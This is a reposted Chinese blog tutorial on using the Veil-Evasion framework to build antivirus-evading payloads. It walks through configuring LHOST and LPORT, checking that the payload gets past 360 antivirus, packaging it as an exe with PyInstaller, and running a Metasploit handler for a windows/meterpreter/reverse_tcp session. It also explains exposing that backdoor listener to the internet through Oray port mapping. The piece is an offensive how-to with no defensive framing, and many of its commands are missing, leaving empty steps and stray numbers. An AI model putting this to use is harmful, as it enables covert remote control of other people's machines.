Veil-Evasion:基于Python的免杀Payload生成工具【转】

简介

Veil-Evasion是一个用python写的流行的框架。我们可以用这个框架生成能够规避大多数杀软的载荷。Veil-Evasion被原生设计为在kali上,但其实存在python环境的系统上应该都能运行。

你可以用命令行轻松调用Veil-Evasion,按菜单选项生成payload。在创建payload的时候,Veil-Evasion会询问你是否想把payload文件用Pyinstaller或者Py2Exe转为可执行文件。

安装

下载

  • 官网:https://www.veil-framework.com/
  • github项目地址:https://github.com/Veil-Framework/Veil-Evasion

安装

kali linux可以直接

git克隆安装:

视频介绍

腾讯视频

使用

payload列表

1

使用use、list可以列出当前可用的模块

2

简单实例

我们利用这个payload

这里,我们输入命令:

或者

3

我们只需配置一下options就可以了,包括监听地址,端口,是否生成exe

这里,我们仅配置一下地址,然后run/generate(生成):

5

payload路径:

6

测试360查杀:

7

设置监听:

8

当payload在目标机器运行后,获得session:

1-40 2-39 3-35 5-29 8-22 9-21

Python脚本生成exe

这个过程实际上是生成了一个python脚本,我们可以通过pyinstaller将其转化问exe文件

下面简单讲一下将python脚本生成为exe文件的过程

pyinstaller安装

下载pyinstaller并解压(可以去官网下载最新版):

http://nchc.dl.sourceforge.net/project/pyinstaller/2.0/pyinstaller-2.0.zip

安装最新版本的 pywin32-217.win32-py2.7.exe:

http://download.csdn.net/detail/gfsfg8545/6539111

不然会出现如下错误

具体安装过程可以参考这篇博文:

http://blog.csdn.net/hmy1106/article/details/45151409

一般的命令:(cmd进入到pyinstaller的文件夹)

关于图标的设置问题:应该准备四张不同尺寸(具体尺寸参靠:stackoverflow的png文件,然后用png2icon(下载)脚本把它们合成一张icon图标文件

msf的设置以及veil-evasion的设置

这里分两种情况:

1.内网连接后门

内网比较简单, veil-evasion里选定模之后,可以指定LHOST就是你的计算机在内网的ip,然后受控端也在内网,可以直接到:

这个目录下找到相应的msf脚本,然后执行

然后等待目标运行后门就可以了。

2.外网链接后门

这个就需要进行端口映射,我这里使用了花生壳作为外网端口映射的工具,花生壳的具体操作过程不再赘述。
veil-evasion生成payload的时候,LHOST要设置成你在花生壳上申请的域名(也可以设置从域名指向的ip),LPORT要设置成花生壳分配的那个端口号

花生壳设置的时候,外网域名指向你本机内网的ip地址,和你自己设定的映射端口号。

msf监听

  1. 开启msf
  2. use exploit/multi/handler
  3. set PAYLOAD windows/meterpreter/reverse_tcp
  4. – set LHOST 你本机内网的ip地 ,set LPORT 你本地监听的端口
  5. explit

参考

未经允许

此条目发表在免杀技术, 未分类分类目录。将固定链接加入收藏夹。